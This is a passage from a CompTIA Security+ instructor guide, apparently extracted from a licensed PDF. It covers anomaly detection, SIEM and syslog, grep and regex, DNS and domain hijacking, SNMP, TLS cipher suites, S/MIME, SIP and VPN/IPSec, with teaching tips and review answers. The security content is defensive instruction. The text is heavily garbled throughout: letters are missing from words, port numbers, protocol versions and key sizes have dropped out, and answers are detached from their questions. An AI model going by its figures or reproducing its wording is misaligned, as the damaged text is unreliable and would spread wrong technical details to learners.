Commercial software re uires a paid for subscription to obtain the updates. It
is important to ensure that the software is configured to update only from valid
repositories, ideally using a secure connection method, such as TT .
Behavioral-based detection means that the engine is trained to recogni e baseline Behavior and
normal traffic or events. Anything that deviates from this baseline outside a defined Anomaly ased
level of tolerance generates an incident. The idea is that the software will be able to Detection
identify zero day attacks, insider threats, and other malicious activity for which there is
single signature. Teaching
Tip
istorically, this type of detection was provided by network behavior and anomaly
Make sure students
detection N AD products. An N AD engine uses heuristics (meaning to learn from understand the
e perience to generate a statistical model of what baseline normal traffic looks like. It may di erences between
develop several profiles to model network use at di erent times of the day. This means detection methods
that the system generates false positive and false negatives until it has had time to improve and false negatives
its statistical model of what is normal. A false positive is where legitimate behavior and false positives.
generates an alert, while a false negative is where malicious activity is not alerted.
hile N AD products were relatively unsophisticated, the use of machine learning
in more recent products has helped to make them more productive. As identified by
Gartner's market analysis (gartner.com en documents market guide for
user and entity behavior analytics , there are two general classes of behavior based
detection products that utilize machine learning:
• ser and entity behavior analytics A these products scan indicators from
multiple intrusion detection and log sources to identify anomalies. They are often
integrated with security information and event management I M platforms.
ften behavioral and anomaly based detection are taken to mean the same thing in
the sense that the engine detects anomalous behavior . Anomaly based detection can
also be taken to mean specifically looking for irregularities in the use of protocols. or
e ample, the engine may check packet headers or the e change of packets in a session
against RFC standards and generate an alert if they deviate from strict RFC compliance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
272 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
single console. Nevertheless, TM has some downsides. hen defense is unified under
a single system, this creates the potential for a single point of failure that could a ect
an entire network. Distinct security systems, if they fail, might only compromise that
particular avenue of attack. Additionally, TM systems can struggle with latency issues
if they are sub ect to too much network activity. Also, a TM might not perform as well
as software or a device with a single dedicated security function.
Content/URL Filter
A firewall has to sustain high loads, and overloads can increase latency or even cause
outages. The high comple ity of application aware N and TM solutions can
reduce their suitability as an edge device, because while they might provide high
confidentiality and integrity, lower throughput reduces availability. ne solution to this
is to treat security solutions for server traffic di erently from that for user traffic. ser
traffic refers to web browsing, social networking, email, and video oI connections
initiated by local network clients.
Conse uently, where a stateful or N firewall may be deployed for application
server traffic, the ob of filtering user traffic is often performed by a separate appliance
or pro y host. A content filter is designed to apply a number of user focused filtering
rules, such as blocking uniform resource locators Ls that appear on content
blacklists or applying time based restrictions to browsing. Content filters are now
usually implemented as a class of product called a secure web gateway (SWG). As well
as filtering, a performs threat analysis and often integrates the functionality of
data loss prevention DL and cloud access security brokers CA to protect against
the full range of unauthorized egress threats, including malware command and control
and data e filtration.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 273
ith the odSecurity A installed to this IIS server, a scanning attempt has been detected and logged
as an Application event. As you can see, the default ruleset generates a lot of events.
(Screenshot used with permission from icrosoft.)
• NA I github.com nbs system na si is an open source module for the ngin web
server software.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
274 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
e ie Acti ity
et ork Security onitoring
Answer the following uestions
1. hat is the est option or monitorin tra c passin rom host to host on
the same switch?
The only option for monitoring intra switch traffic is to use a mirrored port.
Installing definition signature updates and removing definitions that are not relevant to
the hosts or services running on your network.
ehavior based detection can e hibit high false positive rates, where legitimate activity
is wrongly identified as malicious. ith automatic prevention, this will block many
legitimate users and hosts from the network, causing availability and support issues.
4. I a indo s s stem file ails a file inte rit chec should ou suspect a
malware infection?
5. What is a WAF?
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 275
Topic 10C
Summari e the se o SIE
ecurity assessments and incident response both re uire real time monitoring of host
Monitoring Services
and network status indicators plus audit information.
Teaching
Packet Capture Tip
Data captured from network sensors sni ers plus net ow sources provides both Give an overview of
the types of data that
summary statistics about bandwidth and protocol usage and the opportunity for
need to be collected,
detailed frame analysis. aggregated, and
analyzed.
Network Monitors
As distinct from network traffic monitoring, a network monitor collects data about
network appliances, such as switches, access points, routers, firewalls, and servers. This
is used to monitor load status for C memory, state tables, disk capacity, fan speeds
temperature, network link utili ation error statistics, and so on. Another important
function is a heartbeat message to indicate availability. This data might be collected
using the imple Network Management rotocol NM or a proprietary management
system. As well as supporting availability, network monitoring might reveal unusual
conditions that could point to some kind of attack.
Logs
Logs are one of the most valuable sources of security information. A system log can
be used to diagnose availability issues. A security log can record both authori ed and
unauthori ed uses of a resource or privilege. Logs function both as an audit trail of
actions and if monitored regularly provide a warning of intrusion attempts. Log review
is a critical part of security assurance. nly referring to the logs following a ma or
incident is missing the opportunity to identify threats and vulnerabilities early and to
respond proactively.
ogs typically associate an action with a particular user. This is one of the reasons that it
is critical that users not share logon details. If a user account is compromised, there is no
means of tying events in the log to the actual attacker.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
276 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
OSSI SIE dashboard Configurable dashboards provide the high-level status view of network
security metrics. (Screenshot used with permission from AT T Cybersecurity.)
o Collection
The first task for I M is to collect data inputs from multiple sources. There are three
main types of log collection:
• Agent based with this approach, you must install an agent service on each host. As
events occur on the host, logging data is filtered, aggregated, and normali ed at the
host, then sent to the SIEM server for analysis and storage.
Syslog (tools.ietf.org html rfc allows for centrali ed collection of events from
multiple sources. It also provides an open format for event logging messages, and
as such has become a de facto standard for logging of events from distributed
systems. or e ample, syslog messages can be generated by Cisco routers and
switches, as well as servers and workstations.
• ensor as well as log data, the I M might collect packet captures and traffic ow
data from sni ers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 277
Enabling a log parser plug-in for a pfSense security appliance so that firewall events can be imported
into the SIE . (Screenshot used with permission from AT T Cybersecurity.)
o A re ation
As distinct from collection, aggregation refers to normali ing data from di erent
sources so that it is consistent and searchable. I M software features connectors
or plug ins to interpret or parse data from distinct types of systems and to account
for di erences between vendor implementations. sually parsing will be carried out
using regular e pressions tailored to each log file format to identify attributes and
content that can be mapped to standard fields in the I M's reporting and analysis
tools. Another important function is to normali e date time one di erences to a
single timeline.
Where collection and aggregation produce inputs, a SIEM is also used for reporting. Analysis and eport
A critical function of I M and the principal factor distinguishing it from basic log eview
management is that of correlation. This means that the I M software can link
individual events or data points observables into a meaningful indicator of risk, Teaching
or Indicator of Compromise I C . Correlation can then be used to drive an alerting Tip
system. These reports would be viewed from the I M dashboard. Note that we will
return to the use of
asic correlation can be performed using simple If Then type rules. owever, many I M and A in the
I M solutions use artificial intelligence AI and machine learning as the basis for lesson on incident
automated analysis. response. ere, e uip
students with a broad
User and Entity Behavior Analytics overview of product
capabilities.
A user and entity behavior analytics A solution supports identification of malicious
behaviors from comparison to a baseline. As the name suggests, the analytics software
tracks user account behavior across di erent devices and cloud services. ntity refers
to machine accounts, such as client workstations or virtualized server instances, and
to embedded hardware, such as Internet of Things IoT devices. The comple ity of
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
278 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
determining baselines and reducing false positives means that A solutions are
heavily dependent on AI and machine learning. amples include Microsoft's Advanced
Threat Analytics docs.microsoft.com en us advanced threat analytics what is ata and
plunk A splunk.com en us software user behavior analytics.html .
Sentiment Analysis
ne of the biggest challenges for behavior analytics driven by machine learning is
to identify intent. It is e tremely difficult for a machine to establish the conte t and
interpretation of statements in natural language, though much progress is being made.
The general e orts in this area are referred to as sentiment analysis, or emotion
AI. The typical use case for sentiment analysis is to monitor social media for brand
incidents, such as a disgruntled customer announcing on Twitter what poor customer
service they have ust received. In terms of security, this can be used to gather threat
intelligence and try to identify e ternal or insider threats before they can develop as
attacks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 279
writes the name of the local machine along with the te t up to the syslog server at
. . .
logger -n 10.1.0.242 `hostname` up
Filtering a log to discover data points of interest usually involves some sort of string egular pressions
search, typically invoking regular expression (regex) synta . A regular e pression is and grep
a search pattern to match within a given string. The search pattern is built from the
rege synta . This synta defines metacharacters that function as search operators,
uantifiers, logic statements, and anchors boundaries. The following list illustrates
some commonly used elements of rege synta
• [ … ] matches a single instance of a character within the brackets. This can
include literals, ranges such as [a-z], and token matches, such as [\s] (white
space or [\d] one digit .
• + matches one or more occurrences. A uantifier is placed after the term to match
for e ample, \s+ matches one or more white space characters.
A complete description of regex syntax is beyond the scope of this course, but you can use
an online reference such as regexr.com or rexegg.com to learn it.
The grep command invokes simple string matching or rege synta to search te t files
for specific strings. This enables you to search the entire contents of a te t file for a
specific pattern within each line and display that pattern on the screen or dump it to
another file. A simple e ample of grep usage is as follows:
grep -F 192.168.1.254 access.log
This searches the te t file access.log for all lines containing some variation of the literal
string pattern 192.168.1.254 and prints only those lines to the terminal. The -F
switch instructs grep to treat the pattern as a literal.
The following e ample searches for any I address in the . . . subnet using
rege synta for the pattern note that each period must be escaped within any file in
any directory from the current one. The -r option enables recursion, while the period
in the target part indicates the current directory:
grep -r 192\.168\.1\.[\d]{1,3}
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
280 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
e ie Acti ity
se o SIE
Answer the following uestions
A I M collector parses input such as log files or packet traces into a standard format
that can be recorded within the I M and interpreted for event correlation. A sensor
collects data from the network media.
No, syslog allows remote hosts to send logs to a server, but syslog does not aggregate
normali e the log data or run correlation rules to identify alertable events.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 281
Lesson 10
Summary
ou should be able to use network appliances such as firewalls, pro ies, ID , and I M Teaching
collectors/aggregators to implement secure network designs. Tip
Check that students
uidelines or Implementin et or ecurit Appliances are confident about
the content that has
Follow these guidelines when you deploy new or upgrade security appliances: been covered. If there
is time, re visit any
• Identify the security re uirements for a network one or area and determine the content e amples that
appropriate security technology to use: they have uestions
about. If you have
• Network firewall to apply an ACL to incoming and outgoing traffic. used all the available
time for this lesson
• ID , I , or ne t gen firewall to implement signature and or behavior based block, note the issues,
and schedule time for
threat detection.
a review later in the
course.
• Content filter to control outbound user access to sites and services.
Interaction
• UTM to implement multiple controls within a single appliance and reporting Opportunity
interface.
ptionally, discuss
• Assess whether endpoints within the one should be protected by additional with students how
security, such as host based firewalls, A s, or file integrity monitoring. comple security
functions can be
• valuate the commercial model and determine whether proprietary or open source implemented as
either separate
is the best fit for your re uirements. or consolidated
solutions. Check if
• Document and test the ACL or other security configuration when implementing the students have any
device to ensure that it meets the design goals. positive or negative
e perience of I M.
• Implement an appropriate method of log and network data collection and
aggregation to ensure monitoring and review of security events:
• Manual methods using syslog and file manipulation tools head, tail, cat, grep,
logger .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 11
Implementing Secure
et ork rotocols
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
284 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 11A
Implement Secure Network
perations rotocols
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 285
Attacking network address allocation a script exhausts the CP pool while another runs a rogue
CP server. A third tool operates a rogue S to supply spoofed information to clients configured to
use the attack machine as a S server, via the rogue CP configuration.
The Domain Name ystem DN resolves fully ualified domain names DNs to I Domain Name
addresses. It uses a distributed database system that contains information on domains esolution
and hosts within those domains. The information is distributed among many name
servers, each of which holds part of the database. The name servers work over port . Teaching
Domain name resolution is a security critical service and the target of many attacks on Tip
both local network and the Internet. opefully students
understand the basic
omain i ac in function of DN and
the use of resource
Domain hijacking is an attack where an adversary ac uires a domain for a company's records. The attacks
trading name or trademark, or perhaps some spelling variation thereof. hile there shown here focus on
the registration of
are often trademark and intellectual property laws against doing this, companies need
domains.
to be careful to renew domain names that they want to continue to use and to protect
the credentials used to manage the registration. A domain name must be re registered
every year.
In a domain hi acking attack an adversary gains control over the registration of a
domain name, allowing the host records to be configured to I addresses of the
attacker's choosing. This might be accomplished by supplying false credentials to the
domain registrar when applying for a new domain name or re registering an e isting
one. An attacker might also be able to e ploit the legitimate account used to manage
the domain via a weak password or malware installed on a client computer or even
to compromise the domain registrar's security procedures in some way upguard.com
blog domain hi acking .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
286 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A company whose domain has been hi acked is likely to find that they are locked out
of the registrar's management console, or that the domain has been transferred to
another registrar, often operating in a di erent country. The whois command can be
used to lookup domain registration information to try to detect misuse in other cases.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 287
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
288 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
indows Server S services with SSEC enabled. (Screenshot used with permission from icrosoft.)
• imple bind the client must supply its distinguished name DN and password, but
these are passed as plainte t.
• imple Authentication and ecurity Layer A L the client and server negotiate
the use of a supported authentication mechanism, such as erberos. The TA TTL
command can be used to re uire encryption sealing and message integrity
signing . This is the preferred mechanism for Microsoft's Active Directory AD
implementation of LDA .
• LDAP Secure (LDAPS) the server is installed with a digital certificate, which it uses
to set up a secure tunnel for the user credential e change. LDA uses port .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 289
Many applications on networks are time dependent and time critical. These include Time ynchroni ation
authentication and security mechanisms, scheduling applications, and backup
software. The Network Time rotocol NT provides a transport over which to
Teaching
synchroni e these time dependent applications. NT works over D on port .
Tip
Top level NT servers stratum obtain the Coordinated niversal Time TC from Most authentication
a highly accurate clock source, such as an atomic clock. Lower tier servers then and access control
obtain the TC from multiple stratum servers and sample the results to obtain an protocols are critically
authoritative time. Most organi ations will use one of these stratum servers to obtain dependent on time
synchroni ation.
the time for use on the LAN. ervers at lower tiers may then perform the same sort of Note the impact on
sampling operation, ad ust for the delay involved in propagating the signal, and provide forensics and log
the time to clients. Clients themselves usually obtain the time using a modified form of analysis. If anyone's
the protocol imple NT . confused by the
abbreviation TC,
NT has historically lacked any sort of security mechanism, but there are moves e plain that it's
to create a security e tension for the protocol called Network Time ecurity language independent
blog.cloud are.com secure time . to keep both the
ritish and the rench
happy or unhappy,
Simple Network Management Protocol Security perhaps .
The Simple Network Management Protocol (SNMP) is a widely used framework for Show Slide(s)
management and monitoring. NM consists of an NM monitor and agents.
• The agent is a process software or firmware running on a switch, router, server, or imple Network
Management rotocol
other NM compatible network device.
ecurity
• This agent maintains a database called a management information base MI that
Teaching
holds statistics relating to the activity of the device for e ample, the number of
Tip
frames per second handled by a switch . The agent is also capable of initiating a trap
NM is one of those
operation where it informs the management system of a notable event port failure,
services that should
for instance . The threshold for triggering traps can be set for each value. Device be shut down if it is
ueries take place over port D traps are communicated over port also not being used. NM
D . may run on devices
such as switches,
• The NM monitor a software program provides a location from which network firewalls, and printers.
activity can be overseen. It monitors all agents by polling them at regular intervals
for information from their MI s and displays the information for review. It also
displays any trap operations as alerts for the network administrator to assess and
act upon as necessary.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
290 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• se difficult to guess community names never leave the community name blank or
set to the default.
• se Access Control Lists to restrict management operations to known hosts that is,
restrict to one or two host I addresses .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 291
Review Activity:
Secure et ork perations rotocols
Answer the following uestions
3. True or alse The contents o the T file are irrele ant as lon as a
ser ice is properl confi ured
alse probably the contents of the T file are written to the DN cache on
startup. It is possible to edit the registry to prioriti e DN over T , though.
Corrupting the records of a DN server to point traffic destined for a legitimate domain
to a malicious I address.
True.
Configure strong community names and use access control lists to restrict
management operations to known hosts.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
292 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 11B
Implement Secure Application rotocols
any argue that TTP is a stateful protocol. ersion of TTP adds more state-preserving
features (blog.zamicol.com 01 0 is-http -stateful-protocol-application.html).
Show Slide(s)
Transport Layer
Transport a er ecurit
ecurity
As with other early TC I application protocols, TT communications are not
Teaching
secured. ecure ockets Layer L was developed by Netscape in the s to
Tip
address the lack of security in TT . L proved very popular with the industry, and
it was uickly adopted as a standard named Transport Layer Security (TLS). It is
oint out that L
can be used with
typically used with the TT application referred to as TT or TT ecure but can
applications other also be used to secure other application protocols and as a virtual private networking
than TT . N solution.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 293
T ersions Teaching
Tip
hile the acronym L is still used, the Transport Layer ecurity versions are the only
This Cloud are blog
ones that are safe to use. A server can provide support for legacy clients, but obviously provides an e cellent
this is less secure. or e ample, a TL . server could be configured to allow clients to overview of the
downgrade to TL . or . or even L . if they do not support TL . . problems with earlier
TL versions for
A downgrade attack is where a man-in-the-middle tries to force the use of a weak cipher students who want
more detail blog.
suite and SS T S version.
cloud are.com rfc
aka tls .
Cipher Suites
A cipher suite is the algorithms supported by both the client and server to perform the
di erent encryption and hashing operations re uired by the protocol. rior to TL . ,
a cipher suite would be written in the following form
ECDHE-RSA-AES128-GCM-SHA256
This means that the server can use lliptic Curve Diffie ellman phemeral mode for
session key agreement, A signatures, bit A CM alois Counter Mode for
symmetric bulk encryption, and bit A for MAC functions. uites the server
prefers are listed earlier in its supported cipher list.
TL . uses simplified and shortened suites. A typical TL . cipher suite appears
as follows
TLS_AES_256_GCM_SHA384
nly ephemeral key agreement is supported in . and the signature type is supplied
in the certificate, so the cipher suite only lists the bulk encryption key strength and
mode of operation A CM , plus the cryptographic hash algorithm A
used within the new hash key derivation function D . D is the mechanism by
which the shared secret established by D key agreement is used to derive symmetric
session keys.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
294 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
tudents may uestion
why the version field
reads TL . . This
field is prone to a
compatibility problem
when servers cannot
identify a new version.
As a workaround,
servers supporting
TL . should use the
supported versions
e tension instead.
iewing the T S handshake in a ireshark packet capture. ote that the connection is using T S 1.
and one of the shortened cipher suites (T S AES 6 GC S A ).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 295
the L carries a severe risk of e posure. A Is can use more secure authentication
and authori ation methods, such as AML and Auth, but these still come with
secrets management re uirements. Another A I consideration is that usage should be
monitored to ensure only authori ed endpoints are making transactions.
mployees may re uire access to all kinds of subscription services. ome e amples ubscription ervices
include
• Market and financial intelligence and information.
• eference and training materials in various formats ebook and video, for instance .
• oftware applications and cloud services paid for by subscription rather than
permanent licenses.
Most of this sort of content will be delivered by a secure web site or cloud application.
It may be necessary to provision authentication mechanisms for enterprise single sign
on access to the services.
Another use of subscriptions is a web feed, where updated articles or news items
are pushed to the client or browser. eb feeds are based on either the eally imple
yndication or Atom formats, both of which use ML to mark up each document
supplied by the feed. It is possible that such feeds may be vulnerable to XML injection
style attacks, allowing an attacker to show malicious links or even interact with the file
system https mikeknoop.com l ml e e ploit .
Subscription services may also describe the outsourcing of network and security
components and procedures. There may also be subscription use of enterprise cloud
applications, which may be mediated by an access broker.
There are many means of transferring files across networks. A network operating ile Transfer ervices
system can host shared folders and files, enabling them to be copied or accessed over
the local network or via remote access over a N, for instance . mail and messaging Teaching
apps can send files as attachments. TT supports file download and uploads via Tip
various scripting mechanisms . There are also peer to peer file sharing services. Make sure students
Despite the availability of these newer protocols and services, the file transfer protocol know the di erences
T remains very popular because it is efficient and has wide cross platform support. between T , T ,
and T , including
ile Trans er rotocol which ports are
associated with which
A File Transfer Protocol (FTP) server is typically configured with several public variant.
directories, hosting files, and user accounts. Most TT servers also function as T
servers, and T services, accounts, and directories may be installed and enabled
by default when you install a web server. T is more efficient compared to file
attachments or TT file transfer, but has no security mechanisms. All authentication
and data transfer are communicated as plain te t, meaning that credentials can easily
be picked out of any intercepted T traffic.
You should check that users do not install unauthorized servers on their PCs (a rogue
server). or example, a version of IIS that includes TTP, TP, and S TP servers is shipped
with client versions of indows, though it is not installed by default.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
296 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
T is tricky to configure when there are firewalls between the client and server.
Conse uently, T is usually the preferred method.
• ort some providers and mail clients use this port for message submission
over implicit TL MT , though this usage is now deprecated by standards
documentation.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 297
Show Slide(s)
ecure Multipurpose
Internet Mail
Configuring mailbox access protocols on a server. tensions
Teaching
A client application, such as Microsoft utlook or Mo illa Thunderbird, Tip
establishes a TC connection to the server over port . The user is
tress the di erence
authenticated by username and password and the contents of his or her mailbo between providing
are downloaded for processing on the local C. is the secured version of the secure ports for
protocol, operating over TC port by default. accessing MT and
mailbo profiles with
Secure IMAP (IMAPS) the use of MIM to
authenticate senders
Compared to , the Internet Message Access Protocol v4 (IMAP4) supports and encrypt messages.
permanent connections to a server and connecting multiple clients to the same ou might also want
mailbo simultaneously. It also allows a client to manage mail folders on the server. to mention policy
based encryption. This
Clients connect to IMA over TC port . They authenticate themselves then retrieve re uires the use of
messages from the designated folders. As with other email protocols, the connection can MIM if there are
be secured by establishing an L TL tunnel. The default port for IMA is TC port . matches to keywords
in a certain message.
If the recipient is
ecure ultipurpose Internet ail tensions unknown e ternal
to the organi ation,
Connection security goes a long way toward preventing the compromise of email the message is held
accounts and the spoofing of email, but end to end encryption cannot usually be until a certificate has
guaranteed. Conse uently, there is still a need for authentication and confidentiality been issued to them
to be applied on a per message basis. ne means of doing this is called Secure/ knowledge.broadcom.
com e ternal
Multipurpose Internet Mail Extensions (S/MIME). To use MIM , the user is issued a
article
digital certificate containing his or her public key, signed by a CA to establish its validity. define a policy based
The public key is a pair with a private key kept secret by the user. To establish the encryption essenti.
e change of secure emails, both users must be using MIM and e change certificates html .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
298 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
1. Alice sends ob her digital certificate, containing her public key and validated
digital ID an email address . he signs this message using her private key.
2. ob uses the public key in the certificate to decode her signature and the
signature of the CA or chain of CAs validating her digital certificate and digital ID
and decides that he can trust Alice and her email address.
3. e responds with his digital certificate and public key and Alice, following the
same process, decides to trust ob.
4. oth Alice and ob now have one another's certificates in their trusted certificate
stores.
5. hen Alice wants to send ob a confidential message, she makes a hash of
the message and signs the hash using her private key. he then encrypts the
message, hash, and her public key using ob's public key and sends a message to
ob with this data as an MIM attachment.
6. ob receives the message and decrypts the attachment using his private key.
e validates the signature and the integrity of the message by decrypting it with
Alice's public key and comparing her hash value with one he makes himself.
The Session Initiation Protocol (SIP) is one of the most widely used session control
protocols. I endpoints are the end user devices also known as user agents , such
as I enabled handsets or client and server web conference software. ach device,
conference, or telephony user is assigned a uni ue I address known as a I niform
esource Indicator I , such as sip bob.dobbs comptia.org
I endpoints can establish communications directly in a peer to peer architecture,
but it is more typical to use intermediary servers and directory servers. A I network
may also use gateways and private branch e change appliances to provide an
interface between the oI network and e ternal telephone and cellular networks.
hile I provides session management features, the actual delivery of real time data
uses di erent protocols. The principal one is Real-time Transport Protocol (RTP).
A threat actor could e ploit unencrypted voice and video communications to try
to intercept passwords, credit card details, and so on. ithout strong mutual
authentication, connections are also vulnerable to man in the middle attacks.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 299
Connection security for voice and video works in a similar manner to TT . To initiate
the call, the secure version I uses digital certificates to authenticate the endpoints
and establish a TL tunnel. here unencrypted I typically runs over TC port ,
I uses TC port . The secure connection established by I can also be used
to generate a master key to use with the secure versions of the transport protocol
(SRTP). T provides confidentiality for the actual call data.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
300 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Application rotocols
Answer the following uestions
1. What type of attack against HTTPS aims to force the server to negotiate
weak ciphers?
A downgrade attack.
2. A client and server have agreed on the use of the cipher suite ECDHE-ECDSA-
AES256- GCM-SHA384 for a TLS session. What is the key strength of the
symmetric encryption algorithm?
bit A .
3. What security protocol does SFTP use to protect the connection and which
port does an SFTP server listen on by default?
The recipient's public key principally . The public key is used to encrypt a symmetric
session key and for performance reasons the session key does the actual data
encoding. The session key and, therefore, the message te t can then only be recovered
by the recipient, who uses the linked private key to decrypt it.
ncrypted oI data is carried over the ecure eal time Transport rotocol T .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 301
Topic 11C
Implement Secure Remote
Access rotocols
emote access means that the user's device does not make a direct cabled or wireless emote Access
connection to the network. The connection occurs over or through an intermediate Architecture
network. istorically, remote access might have used analog modems connecting over
the telephone system or possibly a private link a leased line . These days, most remote Teaching
access is implemented as a virtual private network (VPN), running over the Internet. Tip
Administering remote access involves essentially the same tasks as administering According to some
the local network. nly authori ed users should be allowed access to local network definitions, a N
resources and communication channels. Additional comple ity comes about because need not be secure.
it can be more difficult to ensure the security of remote workstations and servers and owever, this is
what most people
there is greater opportunity for remote logins to be e ploited. understand as a N
ith a remote access N, clients connect to a N gateway on the edge of the private these days.
network. This is the telecommuter model, allowing home workers and employees
working in the field to connect to the corporate network. The N protocol establishes
a secure tunnel so that the contents are kept private, even when the packets pass over
I s' routers.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
302 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A N can also be deployed in a site to site model to connect two or more private
networks. here remote access N connections are typically initiated by the client, a
site to site N is configured to operate automatically. The gateways e change security
information using whichever protocol the N is based on. This establishes a trust
relationship between the gateways and sets up a secure connection through which
to tunnel data. osts at each site do not need to be configured with any information
about the N. The routing infrastructure at each site determines whether to deliver
traffic locally or send it over the N tunnel.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 303
everal N protocols have been used over the years. Legacy protocols such as the Transport Layer
Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do not ecurity N
o er ade uate security. Transport Layer ecurity TL and I ec are now the preferred
options for configuring N access. Teaching
Tip
plain that the
important point
about modern
Ns is to hide
any authentication
information from
eavesdroppers.
rotocols such as
T do not protect
the hash e changed
during the C A
M C A handshake,
making the connection
e tremely vulnerable
to o ine cracking
attempts.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
304 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring a client certificate for mutual authentication in the pfSense security appliance.
(Screenshot used with permission from ubicon Communications, C.)
The port can be either TCP or U P. U P might be chosen for marginally superior
performance, especially when tunneling latency-sensitive traffic such as voice or video. TCP
Show Slide(s) might be easier to use with a default firewall policy. T S over U P is also referred to as
atagram T S ( T S).
Internet rotocol
ecurity
pen N is an open source e ample of a TL N openvpn.net . pen N can work
in TA bridged mode to tunnel layer frames or in T N routed mode to forward
Teaching
I packets. Another option is Microsoft's Secure Sockets Tunneling Protocol (SSTP),
Tip
which works by tunneling oint to oint rotocol layer frames over a TL
oint out that I ec
session docs.microsoft.com en us openspecs windows protocols ms sstp adc df
is an integral part of
I v . Its use with I v c fe b f d b ad a). The Point-to-Point Protocol (PPP) is a widely
is a stop gap until used remote dial in protocol. It provides encapsulation for I traffic plus I address
Internet infrastructure assignment and authentication via the widely supported Challenge andshake
finally switches over Authentication rotocol C A .
to I v the world's
largest software
upgrade . Internet Protocol Security
Note that A provides
only authentication Transport Layer ecurity is applied at the application level, either by using a separate
and integrity, not secure port or by using commands in the application protocol to negotiate a secure
confidentiality. connection. Internet Protocol Security (IPSec) operates at the network layer layer
Note also that only of the I model, so it can be implemented without having to configure specific
immutable fields in
application support. I ec can provide both confidentiality by encrypting data packets
the I header are used
in the IC . The TTL and integrity anti replay by signing each packet . The main drawback is that it adds
field is e cluded, for overhead to data communications. I ec can be used to secure communications on
instance. local networks and as a remote access protocol.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 305
hen IPv6 was being drafted, IPSec was considered a mandatory component as it was
felt that all traffic over the new protocol should be secure. In recent years, Cs have been
revised so that now, IPSec is recommended for IPv6 but no longer mandatory (tools.ietf.org
html rfc6 page-1 ).
